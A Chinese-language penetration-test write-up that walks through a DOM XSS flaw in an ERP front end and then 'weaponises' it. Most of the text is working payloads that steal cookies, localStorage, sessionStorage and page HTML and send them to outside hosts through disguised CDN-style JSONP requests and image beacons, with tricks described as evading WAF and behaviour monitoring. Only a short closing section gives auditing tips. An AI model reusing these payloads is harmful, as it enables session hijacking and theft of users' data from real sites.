声明
本文章所分享内容仅用于网络安全相关的技术讨论和学习,注意,切勿用于违法途径,所有渗透测试都需要获取授权,违者后果自行承担,与本文章及作者无关,请谨记守法。
1. 概述
在一次针对甲方ERP系统的渗透测试中,我发现了一个隐秘的DOM型XSS漏洞。这种表面无害的漏洞通过巧妙构造的Payload,能够绕过同源策略、突破CSP防御,最终实现敏感数据自动化收割并发送到攻击者服务器。本文将完整呈现漏洞从发现到武器化的全路径攻击链。
2. 正文
0x01 漏洞发现:静态代码审计
漏洞代码定位:
// 高危渲染逻辑(核心系统模块)function getAppProps() {web.portal.appProps = skysz.ajax.getSync("./web/portal/appProps");skysz.$("app.name").innerHTML = web.portal.appProps.appName;document.title = skysz.$("app.name").innerText;漏洞成因分析:
- 信任后端返回数据,未做消毒处理
- 使用.innerHTML渲染不可控内容
- API响应头缺失X-Content-Type-Options: nosniff
致命漏洞链:
后端JSON接口 → 前端innerHTML渲染 → DOM解析执行
当接口返回appName: '<img οnerrοr=恶意代码>'时,立即触发XSS
0x02 漏洞验证
// 劫持接口返回实现弹窗验证
Object.defineProperty(web.portal, 'appProps', { get: () => ({ appName: '<img src=x onerror=alert(window.origin)>' })});//触发弹窗
getAppProps();
0x03 数据外泄多种姿势
1、JSONP协议(跨域数据劫持)
Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="const script = document.createElement('script');script.src = 'https://legit-cdn.org/log?callback=__exfil&data=' + btoa(JSON.stringify({storage: localStorage,sessions: sessionStorage}));document.body.appendChild(script);">`})
});//创新方案:伪装合法的CDN请求规避WAF检测2、图片信标突破(隐蔽+长度优化)
<JAVASCRIPT>
Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="(function(){// 双通道智能备份传输const data = {cookies: document.cookie,ls: localStorage,ss: sessionStorage};// 通道1:JSONP主力传输(完整数据)const jsonpScript = document.createElement('script');jsonpScript.src = 'https://cdn.trusted.com/analytics.js?' + 'cid=${Math.random().toString(36).substr(2)}&' +'data=' + btoa(JSON.stringify(data));// 通道2:图片信标备份(关键数据)const beaconImg = new Image();beaconImg.src = 'https://log.tracking.com/pixel.gif?' +'c=' + encodeURIComponent(data.cookies);setTimeout(() => {document.head.appendChild(jsonpScript);document.body.appendChild(beaconImg);}, 2000); // 延时触发绕过行为监控})();">`})
});3、混合传输模式:随机切换JSONP/Image
Object.defineProperty(web.portal, 'appProps', {get: () => ({appName: `<img src=x onerror="(function(){// 组合敏感数据const payload = {cookie: document.cookie,storage: JSON.stringify(localStorage),dom: document.documentElement.innerHTML.slice(0,2000)};// 多路传输保障const jsonpFn = () => {const s = document.createElement('script');s.src = 'http://10.191.129.67:8000/j?d='+btoa(JSON.stringify(payload))+'&t='+Date.now();};const imgFn = () => {new Image().src = 'http://10.191.129.67:8000/i.gif?c='+encodeURIComponent(payload.cookie);};// 随机化传输策略Math.random() > 0.5 ? jsonpFn() : imgFn();})();">`})
});
4、数据外带核心总结
3. 总结
漏洞挖掘规则:
1. **动态渲染点追踪**:- 全局搜索`.innerHTML`、`.outerHTML`、`document.write`- 检查Vue/React的`v-html`和`dangerouslySetInnerHTML`2. **API响应可控性验证**:- 修改后端返回的JSON内容- 测试XSS向量在不同上下文的触发情况3. **同源策略突破路径**:```javascript// 四重渗透路径检测const CHANNELS = ['fetch','WebSocket','navigator.sendBeacon','new Image()'];4. 结语
愿诸君以深度防御为盾,以持续审计为刃,在代码构建的数字迷宫中,搭建不可逾越的安全长城。
系列实时频谱分析记录回放系统)
